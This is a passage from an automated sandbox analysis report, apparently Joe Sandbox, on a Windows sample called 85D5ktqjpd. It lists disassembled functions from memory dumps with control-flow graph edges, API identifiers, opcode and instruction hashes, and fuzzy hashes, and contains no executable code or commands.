                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: ced87bd6abc6569fcd008acc0ea84e680eebebc947ea67aef034eb596abf6424
                                                    • Instruction ID: acaf91cbf20d0180092bfe3a47700c8ced3fce0e9e37050548ad0bd92998e90a
                                                    • Opcode Fuzzy Hash: ced87bd6abc6569fcd008acc0ea84e680eebebc947ea67aef034eb596abf6424
                                                    • Instruction Fuzzy Hash: 3B514C71E0966E9FDB69DF98C8605BDB7B1FF44300F1141BAD11EE72A6CA396A01CB40
                                                    Function 00007FFD9BA701B9 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 296 7ffd9ba701b9-7ffd9ba701c5 297 7ffd9ba701d0-7ffd9ba702a2 CloseHandle 296->297 298 7ffd9ba701c7-7ffd9ba701cf 296->298 302 7ffd9ba702a4 297->302 303 7ffd9ba702aa-7ffd9ba702fe 297->303 298->297 302->303
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 937019d561487733ba1da9f56edcb532b05017b973acdcf01a635cc7853c9428
                                                    • Instruction ID: 442322f6b88986bcfe088e5017ffa393a8f717db5e9e3a42a071ed6a2b5bc03e
                                                    • Opcode Fuzzy Hash: 937019d561487733ba1da9f56edcb532b05017b973acdcf01a635cc7853c9428
                                                    • Instruction Fuzzy Hash: CC416C70D0864C8FDB59DFA8D894BEDBBF0EF56310F1041AAD449E7292DA749885CB41
                                                    Function 00007FFD9BFB39AA Relevance: .5, Instructions: 459COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 438 7ffd9bfb39aa-7ffd9bfb39b8 439 7ffd9bfb3cef-7ffd9bfb3d30 438->439 440 7ffd9bfb39be-7ffd9bfb39cf 438->440 459 7ffd9bfb3d3b-7ffd9bfb3dd1 439->459 441 7ffd9bfb39e5-7ffd9bfb39ec 440->441 442 7ffd9bfb39d1-7ffd9bfb39d5 440->442 445 7ffd9bfb39ee-7ffd9bfb3a04 441->445 446 7ffd9bfb39a4-7ffd9bfb3ce5 441->446 442->439 444 7ffd9bfb39db-7ffd9bfb39e3 442->444 444->441 449 7ffd9bfb3a0a-7ffd9bfb3a12 445->449 450 7ffd9bfb3a94-7ffd9bfb3aa2 445->450 446->439 449->439 453 7ffd9bfb3a18-7ffd9bfb3a2a 449->453 455 7ffd9bfb3a8f 450->455 456 7ffd9bfb3aa4-7ffd9bfb3ac4 450->456 453->439 454 7ffd9bfb3a30-7ffd9bfb3a47 453->454 457 7ffd9bfb3a87-7ffd9bfb3a8e 454->457 458 7ffd9bfb3a49-7ffd9bfb3a50 454->458 455->450 463 7ffd9bfb3aca-7ffd9bfb3acb 456->463 464 7ffd9bfb3b6e-7ffd9bfb3b77 456->464 457->449 457->455 458->439 460 7ffd9bfb3a56-7ffd9bfb3a84 458->460 468 7ffd9bfb3d56-7ffd9bfb3dd6 459->468 469 7ffd9bfb3ddc-7ffd9bfb3ec3 call 7ffd9bff5658 459->469 460->457 470 7ffd9bfb3ace-7ffd9bfb3ae4 463->470 466 7ffd9bfb3caf-7ffd9bfb3cbd 464->466 467 7ffd9bfb3b7d-7ffd9bfb3b83 464->467 471 7ffd9bfb3cbf 466->471 472 7ffd9bfb3cc4-7ffd9bfb3cd5 466->472 467->439 473 7ffd9bfb3b89-7ffd9bfb3b98 467->473 468->469 484 7ffd9bfb3d78-7ffd9bfb3dd8 468->484 470->439 475 7ffd9bfb3aea-7ffd9bfb3b0e 470->475 471->472 476 7ffd9bfb3b9e-7ffd9bfb3ba5 473->476 477 7ffd9bfb3ca2-7ffd9bfb3ca9 473->477 478 7ffd9bfb3b10-7ffd9bfb3b33 475->478 479 7ffd9bfb3b61-7ffd9bfb3b68 475->479 476->439 483 7ffd9bfb3bab-7ffd9bfb3bb5 476->483 477->466 477->467 478->439 488 7ffd9bfb3b39-7ffd9bfb3b5f 478->488 479->464 479->470 489 7ffd9bfb3bbc-7ffd9bfb3bc7 483->489 484->469 493 7ffd9bfb3d9c-7ffd9bfb3dda 484->493 488->478 488->479 491 7ffd9bfb3c06-7ffd9bfb3c15 489->491 492 7ffd9bfb3bc9-7ffd9bfb3be0 489->492 491->439 498 7ffd9bfb3c1b-7ffd9bfb3c3f 491->498 492->439 496 7ffd9bfb3be6-7ffd9bfb3c02 492->496 493->469 504 7ffd9bfb3dbd-7ffd9bfb3dd0 493->504 496->492 501 7ffd9bfb3c04 496->501 502 7ffd9bfb3c42-7ffd9bfb3c5f 498->502 505 7ffd9bfb3c82-7ffd9bfb3c98 501->505 502->439 506 7ffd9bfb3c65-7ffd9bfb3c80 502->506 505->439 507 7ffd9bfb3c9a-7ffd9bfb3c9e 505->507 506->502 506->505 507->477
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6c5731bfa7f6add143c5f688a73592355396a09b99948c2213f12d0c28596c3
                                                    • Instruction ID: 2d8d82e0b90b53289872647eacbaee5dd89676c859c912d1e0a67ad2eee8bf41
                                                    • Opcode Fuzzy Hash: c6c5731bfa7f6add143c5f688a73592355396a09b99948c2213f12d0c28596c3
                                                    • Instruction Fuzzy Hash: B802F47061966A8FEB59CF58C4E06B477A1FF44300F5142BEC84ECB69ACA39F985CB41
                                                    Function 00007FFD9BFB49D0 Relevance: .4, Instructions: 416COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 512 7ffd9bfb49d0-7ffd9bfb49de 513 7ffd9bfb49e4-7ffd9bfb49f6 call 7ffd9bfb43a0 512->513 514 7ffd9bfb4b61-7ffd9bfb4b75 512->514 519 7ffd9bfb49f8-7ffd9bfb49fd 513->519 520 7ffd9bfb49c5-7ffd9bfb4ba3 513->520 516 7ffd9bfb4b77 514->516 517 7ffd9bfb4b7c-7ffd9bfb4b87 514->517 516->517 522 7ffd9bfb4a1f-7ffd9bfb4a30 519->522 523 7ffd9bfb49ff-7ffd9bfb4a03 519->523 527 7ffd9bfb4baa-7ffd9bfb4bc5 520->527 526 7ffd9bfb4a36-7ffd9bfb4a4b 522->526 522->527 524 7ffd9bfb4a09-7ffd9bfb4a1a 523->524 525 7ffd9bfb4b03-7ffd9bfb4b14 523->525 524->514 529 7ffd9bfb4b16 525->529 530 7ffd9bfb4b1b-7ffd9bfb4b26 525->530 526->527 528 7ffd9bfb4a51-7ffd9bfb4a5d 526->528 535 7ffd9bfb4bc7 527->535 536 7ffd9bfb4bcd 527->536 531 7ffd9bfb4a5f-7ffd9bfb4a76 call 7ffd9bfb2eb0 528->531 532 7ffd9bfb4a8e-7ffd9bfb4aa4 call 7ffd9bfb43a0 528->532 529->530 531->525 542 7ffd9bfb4a7c-7ffd9bfb4a8b call 7ffd9bfb2fe0 531->542 532->525 545 7ffd9bfb4aa6-7ffd9bfb4ab1 532->545 535->536 539 7ffd9bfb4bcf 536->539 540 7ffd9bfb4bd1-7ffd9bfb4c33 536->540 539->540 543 7ffd9bfb4c11-7ffd9bfb4c13 539->543 562 7ffd9bfb4bfb-7ffd9bfb4c37 540->562 563 7ffd9bfb4c3e-7ffd9bfb4c5c 540->563 542->532 549 7ffd9bfb4c15-7ffd9bfb4c30 543->549 550 7ffd9bfb4c5e-7ffd9bfb4c90 543->550 545->527 548 7ffd9bfb4ab7-7ffd9bfb4acc 545->548 548->527 552 7ffd9bfb4ad2-7ffd9bfb4ae5 548->552 561 7ffd9bfb4d78-7ffd9bfb4d7d 550->561 556 7ffd9bfb4ae7-7ffd9bfb4b01 call 7ffd9bfb2eb0 552->556 557 7ffd9bfb4b39-7ffd9bfb4b41 552->557 556->525 566 7ffd9bfb4b27-7ffd9bfb4b36 call 7ffd9bfb2fe0 556->566 564 7ffd9bfb4b49-7ffd9bfb4b4c 557->564 581 7ffd9bfb4cac-7ffd9bfb4d87 561->581 582 7ffd9bfb4d91-7ffd9bfb4daf 561->582 562->543 569 7ffd9bfb4b53-7ffd9bfb4b5b 564->569 566->557 569->514 575 7ffd9bfb499a-7ffd9bfb49a7 569->575 575->569 577 7ffd9bfb49ad-7ffd9bfb49c1 575->577 577->569 592 7ffd9bfb4cd6-7ffd9bfb4cd9 581->592 593 7ffd9bfb4d5d-7ffd9bfb4d75 581->593 592->593 594 7ffd9bfb4cdf-7ffd9bfb4ce2 592->594 593->561 596 7ffd9bfb4d4b-7ffd9bfb4d52 594->596 597 7ffd9bfb4ce4-7ffd9bfb4d11 594->597 598 7ffd9bfb4d54-7ffd9bfb4d5c 596->598 599 7ffd9bfb4d12-7ffd9bfb4d2c 596->599 600 7ffd9bfb4db1-7ffd9bfb4e01 call 7ffd9bfb15f0 599->600 601 7ffd9bfb4d32-7ffd9bfb4d3d 599->601 601->600 603 7ffd9bfb4d3f-7ffd9bfb4d49 601->603 603->596
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec829c2e9794ae44958624a1f1d9e9302ed8fe03b37602de85ea64993f8c1b9e
                                                    • Instruction ID: 22c26374f50754a87d17ce05cfc94931539608d0f2fd26d42344e1f6982424ee
                                                    • Opcode Fuzzy Hash: ec829c2e9794ae44958624a1f1d9e9302ed8fe03b37602de85ea64993f8c1b9e
                                                    • Instruction Fuzzy Hash: 15E1E330B0EB6A8FE378CF58D5A057577E0FF44300B15467EC58EC76A6DA2AB9428B41
                                                    Function 00007FFD9BFB060F Relevance: .4, Instructions: 387COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 413402bb9c50bac84cafc619903e82c4fca93b9b93ab493945064d96e58273bc
                                                    • Instruction ID: 731f6d8b3d6b2bfa9ca7dc59515c48e5a8fb10cd908d33aaa0fe4dcdf2a07fb9
                                                    • Opcode Fuzzy Hash: 413402bb9c50bac84cafc619903e82c4fca93b9b93ab493945064d96e58273bc
                                                    • Instruction Fuzzy Hash: 0851B632A0E7AE9FD756ABB8A8644E87BB0EF05314F0501BBD04DC71E3DE296905C751
                                                    Function 00007FFD9BFBBF49 Relevance: .4, Instructions: 379COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be56de8cd0bc996d070847b14a53dbfecadc4cfc037ea5e6da3253418c0a1764
                                                    • Instruction ID: 02bdcd01b1ab015358ca47146de2fad86746bb7a548695a3358fbb8ca25266a1
                                                    • Opcode Fuzzy Hash: be56de8cd0bc996d070847b14a53dbfecadc4cfc037ea5e6da3253418c0a1764
                                                    • Instruction Fuzzy Hash: BAD1D330A0D92D8FEBB8DE48C8A5AA573E1FF54311F5102B9D11DD72A2DE29AD45CF80
                                                    Function 00007FFD9BFBCA39 Relevance: .4, Instructions: 378COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8283c736606910b5ab40e600beac339cc765e0bd4294ca3ab9b36843644fcf3
                                                    • Instruction ID: e6ba17d1dfbce78f53ebb562913a8d8c8aa2a77ed0dc50dbe41f58f46224bb10
                                                    • Opcode Fuzzy Hash: f8283c736606910b5ab40e600beac339cc765e0bd4294ca3ab9b36843644fcf3
                                                    • Instruction Fuzzy Hash: 7E513A36F0D53ECAD368BF98A4615F9B750EF08354B1502B7D21EC71D2CE2A69018F80
                                                    Function 00007FFD9BFBBCD0 Relevance: .4, Instructions: 370COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 09666e6a9bc807aa37fce492ec4ff2d32237692eb47cd995053bbb2c24397664
                                                    • Instruction ID: b5c6f12a0a936c62f87da24d19bfe27268aa6e4f393f64ea0a2ad96e000a5681
                                                    • Opcode Fuzzy Hash: 09666e6a9bc807aa37fce492ec4ff2d32237692eb47cd995053bbb2c24397664
                                                    • Instruction Fuzzy Hash: 73C19130B18A1D8FDB98DF58C8999B9B3E2FF59314B1541A9D04EC72A6DA35FC42CB40
                                                    Function 00007FFD9BFBFA8F Relevance: .4, Instructions: 363COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ecf781c9af1807c47aa54dfc6abfcb1272f5cbaa0caa4a306855d68e6b642afd
                                                    • Instruction ID: d631582760e59ef7ad3d2df053a3288cf24a312e74df77d34de98a43c7fe3728
                                                    • Opcode Fuzzy Hash: ecf781c9af1807c47aa54dfc6abfcb1272f5cbaa0caa4a306855d68e6b642afd
                                                    • Instruction Fuzzy Hash: 83D19070A1956A8FEB58CF48C4E05B137A1FF89310B5546FDC94F8B69BC639E982CB40
                                                    Function 00007FFD9BFBFAAF Relevance: .3, Instructions: 334COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6bead22c729b87836147981c967d7cd868eb63cd12df4494927b564b1af2972
                                                    • Instruction ID: 68c9158c36a8d1b32a2032ffb903a868a5f43c2d6fc90bade4fa6c5d53eeebfe
                                                    • Opcode Fuzzy Hash: a6bead22c729b87836147981c967d7cd868eb63cd12df4494927b564b1af2972
                                                    • Instruction Fuzzy Hash: 50C1B130A1956A8BEB1DCF58C4E05B137A1FF89310B5546FDC94F8B69BCA39E981CB40
                                                    Function 00007FFD9BFBCAF7 Relevance: .3, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d92715830c5fb9d8a91dbdcdede38d056ab5a9334e2ea588b8cf7a5682ae439d
                                                    • Instruction ID: d2c178e17048365c93f2af9f978cd3ade9dcec8d3ad35ea7d7348ef67a64934c
                                                    • Opcode Fuzzy Hash: d92715830c5fb9d8a91dbdcdede38d056ab5a9334e2ea588b8cf7a5682ae439d
                                                    • Instruction Fuzzy Hash: BE412935F0E97ECAE7799F9494611F97BA0EF58300F1502BAD16DC61E2CD2A69408B41
                                                    Function 00007FFD9BFB3242 Relevance: .3, Instructions: 327COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a3a87f3906f5c36ba6cd4b6bda0f9eecc7d6886ebda9a0fedad5ec0b403d982
                                                    • Instruction ID: 95e5404e0d001b7a45b1ba6f4a9d51256c4378e5c7efb79aa66049ed4f8b44b6
                                                    • Opcode Fuzzy Hash: 3a3a87f3906f5c36ba6cd4b6bda0f9eecc7d6886ebda9a0fedad5ec0b403d982
                                                    • Instruction Fuzzy Hash: 9EC1F530B0DA5A8FE759DF58C4A06A4B7A0FF48300F4542BAC14EC7A96DB39B955CB80
                                                    Function 00007FFD9BFBF342 Relevance: .3, Instructions: 327COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d3122caa6e46e028e1e66d040ef1c333deef83856a82017fe66303c88f9daf44
                                                    • Instruction ID: 8c70c52405c6d19a3542ef71bfe5df4d385e267060572dd72ee98ef6b304f40b
                                                    • Opcode Fuzzy Hash: d3122caa6e46e028e1e66d040ef1c333deef83856a82017fe66303c88f9daf44
                                                    • Instruction Fuzzy Hash: 07C1F630F09A5B8FE759DF68C4A06A0B7A1FF44300F4542BDD54EC7AA6CB29B951CB80
                                                    Function 00007FFD9BFBD0FC Relevance: .3, Instructions: 300COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e97d2eec606029781386cad1ea643eb6efbe683dc06914a659ee22ba3a3a8208
                                                    • Instruction ID: 0dbb21c941f360497c324768dc3779f660af82efc9421cb4e7b0c56839c3ff09
                                                    • Opcode Fuzzy Hash: e97d2eec606029781386cad1ea643eb6efbe683dc06914a659ee22ba3a3a8208
                                                    • Instruction Fuzzy Hash: 8F914A7AE0F5BE5FF7619EA898B54F87BA0EF40340F0502B6D14D879E3DD1A65018B42
                                                    Function 00007FFD9BFBE886 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f82b913b1d98b617f29bc773b3f6a65989dc645f687ba408935e42b6d0958e1a
                                                    • Instruction ID: 1daff82293dd86e546ba58f5b28be5547671bb720b6c5b35b6dcb79701d980a1
                                                    • Opcode Fuzzy Hash: f82b913b1d98b617f29bc773b3f6a65989dc645f687ba408935e42b6d0958e1a
                                                    • Instruction Fuzzy Hash: B781C031F0DA1A8FE7B85EA89464075B7D4FF45310F150A7ED58EC31A3DE29BA068B41
                                                    Function 00007FFD9BFB2776 Relevance: .3, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 724c366532fc263e6670f1a820c4d26d9c79caa7dcb97458b8ff6dc5a0bf648c
                                                    • Instruction ID: cc1d49b51c7a5057b1fc581f87964339cafb2f85a31b113d1de1ced5e7787f30
                                                    • Opcode Fuzzy Hash: 724c366532fc263e6670f1a820c4d26d9c79caa7dcb97458b8ff6dc5a0bf648c
                                                    • Instruction Fuzzy Hash: E6813931B0E65E4FEB385ED8A4650757BE0EF45310B15067ED18EC31A2DE2AFA028B52
                                                    Function 00007FFD9BFB0BA9 Relevance: .2, Instructions: 244COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 22bf8123ec86871637c5d7d07de5139e586b130b6e41587864e5aae05972bf99
                                                    • Instruction ID: 34f8741e469dc63c49271b17108392faee0452d99242270c67ebda9ecc3f6729
                                                    • Opcode Fuzzy Hash: 22bf8123ec86871637c5d7d07de5139e586b130b6e41587864e5aae05972bf99
                                                    • Instruction Fuzzy Hash: C7716A72B0E45D4FE778DE6988664B437C0FF48710B1203BAD15EC75B2DF19A9068B81
                                                    Function 00007FFD9BFBBABB Relevance: .2, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d48a7cd6c1af7a084ea8465624b96339b41a722f9d88bc1274d3e989f6fc9feb
                                                    • Instruction ID: 91fb96a042d55e3812fe7df749c108488126a49cbecee55c8b623820d9818dc4
                                                    • Opcode Fuzzy Hash: d48a7cd6c1af7a084ea8465624b96339b41a722f9d88bc1274d3e989f6fc9feb
                                                    • Instruction Fuzzy Hash: 9271D430E1D55E8EEBA9DFA488645BCBBA0FF45300F5102BAD10EC71A6DE296941CB40
                                                    Function 00007FFD9BFB147B Relevance: .2, Instructions: 224COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d0614f270617f10be3c4006a29ec97a1f64dbc1799c5f769d9879fb4d47a26d
                                                    • Instruction ID: f1325a4006ca9f78520cf7c22645bc4eacb59af276f27298cbc27df95da9426b
                                                    • Opcode Fuzzy Hash: 2d0614f270617f10be3c4006a29ec97a1f64dbc1799c5f769d9879fb4d47a26d
                                                    • Instruction Fuzzy Hash: 4771C330E2E55E8EEB69DFA488645BC7BA1FF45300F5502BAD10FC71E1DE2A6A41CB01
                                                    Function 00007FFD9BFC0AD1 Relevance: .2, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 82113b8c1884b6ca9dbb094846cf7edcec96ba15a14c3f1d2a2a592826a44b5f
                                                    • Instruction ID: 035561295da245ac193e25efc3ccd9be2078183cbd4e358870a6c65c75aa755c
                                                    • Opcode Fuzzy Hash: 82113b8c1884b6ca9dbb094846cf7edcec96ba15a14c3f1d2a2a592826a44b5f
                                                    • Instruction Fuzzy Hash: A781C83160EB0A8FD374EF64D0A057177A1FF44704B51467EC48EC7AA6CB2AB982C740
                                                    Function 00007FFD9BFBD1FC Relevance: .1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 425b1df02261edae563f1850a63cc1f5cfaa1d7604bf7f82f226cd95d82329e0
                                                    • Instruction ID: 314f738c72f0568a84b535ce56ae3a867d54c4988668ca0d12ab6f263b15d1f0
                                                    • Opcode Fuzzy Hash: 425b1df02261edae563f1850a63cc1f5cfaa1d7604bf7f82f226cd95d82329e0
                                                    • Instruction Fuzzy Hash: 8241F375E0D9AE9FEB64DF98D8619FDBBB1FF84300F100136D10DD3AA2DA2965018B01
                                                    Function 00007FFD9BFBFE20 Relevance: .1, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a5e5a5f7c7d6ba414236b29175439858b5d7eb8ebcb2d4e40882f8bcb9b21032
                                                    • Instruction ID: bc5858f1d02e537de6fa53616739bef2b72661cf15959a9d549b3717f26e10ce
                                                    • Opcode Fuzzy Hash: a5e5a5f7c7d6ba414236b29175439858b5d7eb8ebcb2d4e40882f8bcb9b21032
                                                    • Instruction Fuzzy Hash: A2411620F1D96E4FEB78DA5884B06B8B7A1FF94301F1542FAC14EC7597CD39AA818B40
                                                    Function 00007FFD9BFC1087 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e002152519134f66a04c1789532b5be7b02b202c1ba768e60253ba725c6a269e
                                                    • Instruction ID: d3f4e058ee456bc03c8cde159b468dab54a11221846b067a0f10c3200de369d8
                                                    • Opcode Fuzzy Hash: e002152519134f66a04c1789532b5be7b02b202c1ba768e60253ba725c6a269e
                                                    • Instruction Fuzzy Hash: 1B41A33170C9488FDF9CFF58D465DA473E0FBA8321B0402AAD04AC3292DE25ED95CB81
                                                    Function 00007FFD9BFB4FF7 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
